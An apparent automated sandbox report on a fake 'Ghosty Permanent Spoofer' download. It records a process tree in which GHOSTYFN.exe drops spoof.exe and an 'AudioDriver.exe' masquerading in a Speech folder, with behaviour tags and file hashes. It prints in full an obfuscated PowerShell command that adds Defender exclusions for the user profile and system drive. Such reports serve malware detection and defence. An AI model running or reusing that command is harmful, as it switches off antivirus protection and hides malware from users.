E2MiI-PGV2ZW50IGV2ZW50dHlwZT0iMzIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjQiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUzMTI1Mzc0MTEiLz48L2FwcD48L3JlcXVlc3Q-1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:4676
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDE5Nzg3NTEtNkVERi00OTM4LThENDktNzI1NTRDQzZEODNCfSIgdXNlcmlkPSJ7Qzg3OUI1RTUtMEQ0MC00RDY4LTg4ODktNjc2RkU4MDEzQTg0fSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins2MEE4MDdDMS05M0JGLTQ2RkMtODlDMy1GQ0VGOEJFMDAxNDJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjQzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMSIgY29ob3J0PSJycmZAMC4wOCI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSIyIiByZD0iNjYxMiIgcGluZ19mcmVzaG5lc3M9Ins2RkJBQTk1RC1FM0UzLTQwRkEtQUVCNS0wRUIwMjZENjY4QTB9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjEzMi4wLjI5NTcuMTQwIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9IjEiIGNvaG9ydD0icnJmQDAuNzIiIG9vYmVfaW5zdGFsbF90aW1lPSIxODQ0Njc0NDA3MzcwOTU1MTYwNiIgdXBkYXRlX2NvdW50PSIxIiBsYXN0X2xhdW5jaF9jb3VudD0iMSIgbGFzdF9sYXVuY2hfdGltZT0iMTMzODM0MzE2MDA2NTAyNDIwIj48dXBkYXRlY2hlY2svPjxwaW5nIGFjdGl2ZT0iMSIgYT0iMiIgcj0iMiIgYWQ9IjY2MTIiIHJkPSI2NjEyIiBwaW5nX2ZyZXNobmVzcz0ie0M4QkYxQzI4LUYxRTYtNEU0Ri1CMzE4LTIyRUMyMTQ4MjU0N30iLz48L2FwcD48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iMTMyLjAuMjk1Ny4xNDAiIG5leHR2ZXJzaW9uPSIiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBjb2hvcnQ9InJyZkAwLjI1IiB1cGRhdGVfY291bnQ9IjEiPjx1cGRhdGVjaGVjay8-PHBpbmcgcj0iMiIgcmQ9IjY2MTIiIHBpbmdfZnJlc2huZXNzPSJ7MkIyOUY3QkItN0QwRS00MzVDLUEyQjAtQTU2NzNEQkQwRjhFfSIvPjwvYXBwPjwvcmVxdWVzdD41⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:1956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5228,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=3724 /prefetch:141⤵PID:244
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:1508
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4368,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4384 /prefetch:141⤵PID:4372
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\" -spe -an -ai#7zMap17337:110:7zEvent220931⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3960
-
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2896 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4724
-
-
C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5524
-
-
C:\Users\Admin\AppData\Local\Temp\spoof.exe"C:\Users\Admin\AppData\Local\Temp\spoof.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1104 -
C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Speech\AudioDriver.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4904
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4372,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4392 /prefetch:141⤵PID:780
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4100,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=3904 /prefetch:141⤵PID:1688
-
C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe"C:\Users\Admin\Downloads\Ghosty Permanent Spoofer\GHOSTYFN.exe"1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGwAdgBqACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAbAB0ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAdwBrACMAPgA="2⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2028
-
-
C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"C:\Users\Admin\AppData\Local\Temp\GHOSTYFN.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6108
-
-
C:\Users\Admin\AppData\Local\Temp\spoof.exe"C:\Users\Admin\AppData\Local\Temp\spoof.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=3868,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4140 /prefetch:141⤵PID:3324
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=3896,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:141⤵PID:4448
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc1⤵PID:1168
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=3952,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4564 /prefetch:141⤵PID:4176
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5340,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5240 /prefetch:141⤵PID:5916
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Checks SCSI registry key(s)
- Checks processor information in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:8
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5352,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4988 /prefetch:141⤵PID:5396
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=4148,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5212 /prefetch:141⤵PID:1580
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5380,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5436 /prefetch:141⤵PID:4492
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5516,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=4364 /prefetch:141⤵PID:4344
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /01⤵
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1612
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5556,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5384 /prefetch:141⤵PID:5228
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=5328,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5608 /prefetch:141⤵PID:940
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5592,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=5424 /prefetch:141⤵PID:4536
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
326KB
MD548ac275f318ca27855a5fdef0b610063
SHA1cf1b9f457450980b9292e57d0a680c5095316db0
SHA2562afe0db9674786a50be325c75a4897255002bfd8ac15acd01b058178f3ca8696
SHA512b650cbd2d9eeace9973b9f659f2aa0a25235d53dbbdbc1a8db02a818ebb58621c89b890128c10fc2e68c46dd18c96298cb87dfe654e408c9525c174f77d3a5f8
-
Filesize
351KB
MD595bb4d6475e08bf50a5a441dbdbed8f1
SHA19949380636c9980b78ef538b6ff287b34cfa68b2
SHA2564c546ca3aba3ee20eaf0dccfc0c9966a92d6e245e9b4554721fd06db8ac54d61
SHA51268b7bc1c4d601ca5dbd2a2fd7cf041008b1c8dc034a7788deca71b5db5033bf4a7913ce64076990b3d43441ee998f4813b82d21ab421ada0da3a3874f700f458
-
Filesize
64KB
MD59e466b4837d8431be725d6b9c1b4d9ef
SHA13f247b7c89985a41d839cad351cd0fc182fcb284
SHA2562f9a5eeb5ac8cec52a3e73621e4d392f501f5d657dfec3215ccd40eec317208d
SHA51201de0fda555d63b5c38339b0f6d38c28de2a882643439679e63cf5d75f13516b57dc90e8dfb8c638bda328fc12342e58d1e501acec8f85b92dbd5589dac06418
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
960B
MD516846df493521e84fe47cd6b6451ec8f
SHA16d99eb017c5aec08d3a7e908bbd4a051ce250c02
SHA25669f19f2ab2f3625faca623477864766ab1ef3a21712bc892d7b2b0886585b3f9
SHA512aefa5121601b8273cff6b79b7f76417c71e29e835b66faf3e1a67d0d38fb9ebe90320b75493fd5c4a2d9ea3e3c485d0a84bcdbfb78c26a8ecee3175cd8bd93cd
-
Filesize
2KB
MD5d0c46cad6c0778401e21910bd6b56b70
SHA17be418951ea96326aca445b8dfe449b2bfa0dca6
SHA2569600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02
SHA512057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949
-
Filesize
805B
MD59d0cacca373731660e8268a162d9d4ff
SHA1a82111d00132cdf7ef46af5681601d55c6a0e17c
SHA25695932f81206717ff86f0974ee37dc40d5d914f730f00a08344b4c1765d663394
SHA5128c971ab501fc322b13f53b03325b2295e1eedb12b6d50a4225e6e3b4bf5128665b1a3d8b560a8b04f14bfa6f5cba41058e4f546139101fc303f3b8393f5ca485
-
Filesize
18KB
MD5b1953e43deba9376626df75b5aaf0ea3
SHA104885405aa511a5cbce458c807e3afd38b043ec6
SHA256b220f715d1c942778d3864c0b353f69d00ccd58a4136aa5b692b6668a905327d
SHA512540badb6c5bb66487a83f1241ce9b04912f61d1c960490f505e7f6c6deb3afafad999b2dd9413d5c99bb155c72bdf57385a9abb06461f4971b3098ed4804ef57
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\activity-stream.discovery_stream.json.tmp
Filesize25KB
MD57b0174dde10315f3c610bb51ecb47b93
SHA19a1f31079ea91ee760b263c890e3ae609d3a14f6
SHA256fdad8e30fa8d1c8283d3c4fd80bd755e2bc3f5a466d0589047952d51ee93ca75
SHA512186721481f416188ad9c23fae44e24e32f4b0e7038da018a13df2d486aa0298bde9ba31d194f7f1f9fcc44454309be7d001993a2791248afb144161e2c7e1e7a
-
Filesize
12KB
MD5f6d4539d582bfda28ea49621c5f9920f
SHA127aa9773d41e1bb20edcaa017205eb216e633d14
SHA256f3a015e99aa3a9e869351ff473374a9eecd52eb1931e51a574d99a857a37dd30
SHA512dec0f7ffc64a0d8cb86c978d4a9c19c0753a81612e5a5cf55ae99d8ac493ff449246a20f9c190190c0d54ce4d3290eb52344ea36e818cf717d7dab3495fc0772
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\cache2\entries\D18FB7DA89F8DD4E7A2C97703A1647E8C981D05A
Filesize13KB
MD5972e381c0628c0a468911fab4f42a941
SHA18f7ed26692f537ad45676efd0e8afdd986e09770
SHA256aa03f52eb96b9b2c90353bf666033ad8c27e6d00fb7035f060db9097b0ca9846
SHA512d85257cbda3ee78955abcdea12ed1b1c30721d034c5292043ffb044a8d9b2941265d420bb6eb812e4069a111f604cb306715a568f7c72fd939b9ae2c9f81380b
-
Filesize
4.9MB
MD5e65c905174e5f9951a79413833422356
SHA19a8f620da9358e95323548943ca06e6259f44623
SHA256df7e9a74650903532a58491fb925a97114c765d8551b205d5b74cd77b6d0e062
SHA512534f96d756e4584b2e5a441c059ae9456b7e899e1cca3e95ed3a9c65313ceb872575a6e29b38aba57139fe4c8660d31dda9842a6ad1c6f735aa2d93473711465
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.2MB
MD5d66d5168a0fb7326e23963f4e8502e32
SHA18e5d448ff498a01afc000f9be8a3d5a6591c2a9a
SHA2567d0f79a9febca115226349613a122d06c83e4fc9b8d955e6cc7654bad357ff9e
SHA5125a06b4c83cdee5ff2d6b7c914a021c8e7f43370f2ee3a63d376fbf568648a162098b956d3eb1fe9cf5920c269868f40fc0dc43f73ac7413039eea71056a9eb19
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
Filesize
626KB
MD5d8aec01ff14e3e7ad43a4b71e30482e4
SHA1e3015f56f17d845ec7eef11d41bbbc28cc16d096
SHA256da1d608be064555ab3d3d35e6db64527b8c44f3fa5ddd7c3ec723f80fc99736e
SHA512f5b2f4bda0cc13e1d1c541fb0caea14081ee4daffd497e31a3d4d55d5f9d85a61158b4891a6527efe623b2f32b697ac912320d9be5c0303812ca98dcc8866fcf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms
Filesize9KB
MD5d44fba699f50cb827810f7db024a4725
SHA128bade42fcad9eb9431f3f5df4eb5d030b4189c2
SHA2560a49110106626e5c4dbcafa6bee5b62d4a33bd63242db7c76b91ebbf3f6dc049
SHA51293f9a80fd005ee0145cecdf755e44848353fd05776b535bbd3aa3522dd7eff1087f5571ff900450769e02e930185754a071491a4bf847566613a8eaf4289cdb2
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SXJWNMIUF5K7RPD9ZMRW.temp
Filesize9KB
MD5d0df2a46f7341a1b0840b44c7bdbe320
SHA16b2d1c27203f9c78bd6a19390cdfd16f077b8e91
SHA25629617cdaf0d6518df7929553bd0a3838c1d124ea4f6ba18c9250abcb998e5580
SHA512bcc820faa47178ee5bf0e5f866c40c4bfb0ef9dca0d7955a40434243ae88778fb46c5144132c50daf5b6595827d7a94718f6706f50c40811b2ad48ec452a504c
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\AlternateServices.bin
Filesize11KB
MD56a97d73f6ab1c5e806d3c52b85026530
SHA1f7f63a35679fd3023b64a5d993425be193dfb92b
SHA256c44993d747d13befb512a424ec2864b8e273eb9a86feb751c23af8e47d6e0564
SHA51209147756b9391e4da4a9c7784297d01f672001b793b664092a7d05732352a2bb3ccff368e275ccc6870f603604e2522bb323ca3a523e79dcdf893994fc3fa340
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\AlternateServices.bin
Filesize7KB
MD55b42b732d823d6e91b70191f65c5a20c
SHA1a66c191991f5b27bdd3bd352a6036da8eeaddb2e
SHA256f05752a8b6e72d1f5cc661807b3bde8a16f341ce01fb654bb24ae345e8839ecf
SHA51250dec86b78413a4fef5aaff9a4a1999a90233fdee067d2010b90f8835da4f8a772f56330650ed94f551310700f776f3ae2b97949663605b32cc421872e0d84c6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD5b5b461d6c6589cab7d235b572bdf29ef
SHA1b4f609c459d8b42e40daf786f5555fd95a33f7ee
SHA256f9ec1449cef60d8275f8a94e1c63e3c76341796a8b03824830d54404ee3e5280
SHA512e83d7d33700061551b6e1b26e4693617ffce902fad686abc37581a2491cb197c1d10624aa7bca0cadf589f46a71409e0ebca61b0d43b65ea57a256d7f3d32017
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp
Filesize58KB
MD5d8b7c8b4980dd236f0a245043ca66590
SHA134f2660025093a6385223c399223918f8d59b564
SHA256eec75971f4bf9868f8897168add7c77a609b620d56ec1bfcd228afd24eedea4a
SHA5129fb44ce2ff03a9e2dad8158b49394b0ebc1aefa271654c8313e153b73482ebc0167f6ac255afa6bd4203584e7e80f22fdf51d7da73ed5492a5891cbec0dc903f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD55a1d187cbba0b0b8b8cdf5efb60ea46c
SHA1593589f1b21445192a8732a59ed5d7b432cf33a3
SHA2568e4e9d285e4cf13dee6ed3eae7fe4f21ba9b02c3a3ebfd930d3c341dbaf7dbf6
SHA512717844986158efb09263f0894ebfef93e3bf9f61e4715aec42d9e75012f715557ae63ca7622d74c264d7fc1a48903391539645d3e8e639cb3eb09b924a4f3adf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp
Filesize24KB
MD5a4db4e7be4eec45476556b05e3587338
SHA161b8b7cc6124011639ed34ce5005f5190fff7950
SHA256625e04d493f408ceb8e34511fe1eb78951520d7fc90cd205a9366099e8776798
SHA512e36a267cc880d6480197f617ecd7302e69b67e73b3cb7d70f0e4ba187f5e902f3e2d98256075184ee92159cc2e1a869766412861872b58c7b9f69e22e3eb0605
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp
Filesize37KB
MD53573511fb882d497924a3f9004ec6c2f
SHA14bf20f93c8c0d1c4cb3d886fa36c93c6e4812604
SHA2564800fb3eb03d64482f38dff7879aa1acd3e6f2c8a65c7d27bb5a477b4fb4ffb9
SHA512ce82ce8b94c4117ac332434415e218954bfb61ce6f7f0991f4c9793f3c69679af2a0c8ba7ba3fbfdd0592218f1fab0eced6aadc1a0a998a5d0bde314fe1893a7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD55badba29d84c4d9b2f7d3b5a329fa9c7
SHA1958639c7b3f45a6c07a96f88e1f8f396e33a3c82
SHA25624008cee02921adbe134d02e9960985ce3f6be82daa62206106ecbf84cff6639
SHA512eae4ea93281a7de0aa053377ed64b3b3e160266dc3da94d351d3e0822f9edecbcfd4299d0b1f75437b6ec50e25ef9fbaeb7c7e1be7110d486b139a4d3079af8e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\db\data.safe.tmp
Filesize5KB
MD514d4c4c51e6942567fc440050917d9ad
SHA15fb8e8684e57900aa600a25c5f588207bfe7c4eb
SHA2565e3f015811d62d0d4c3e4db7f59cf24c256cfdff4d5d20b8b549d50ae71a6fb6
SHA5121f01aaa7c5021924d53ea479087bd127e5a99e1d157f8b7eb78cfd0e7298cd3a4b966a2882d4b14892c18e9d21fc4487eb2b94dafb78892459e007857693087f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\pending_pings\5b6aa8ae-2577-4190-af3a-019ae30c58d3
Filesize982B
MD565074be749b0d51df7ea8cbaaff0f948
SHA11ae75b691d958b357b4f4730aac047c06cd04707
SHA2566a10b4168a1eaf24fe692cb51bbb830561400920a30018b3696b19987a38f0d8
SHA512ae79eb9f3893febfdef2a18befd9e7001aa2f5dcc904fad8d899be1610c795aec30e15ec533f013d2721e2abce5a0c3a8e4a6acf19805103835f848722ecad39
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6uk3a4hm.default-release\datareporting\glean\pending_pings\a34ab117-bdbd-4021-bc21-ef872400f728
Filesize25KB
MD5d3546c659bdc45f4958503d9d0e90907
SHA118dca2fe3254a38af00a047e882a2b3681592856
SHA256cbf9db51c54e020120a56c688afea32a6509d2475105171ab1629d73e44fbc38
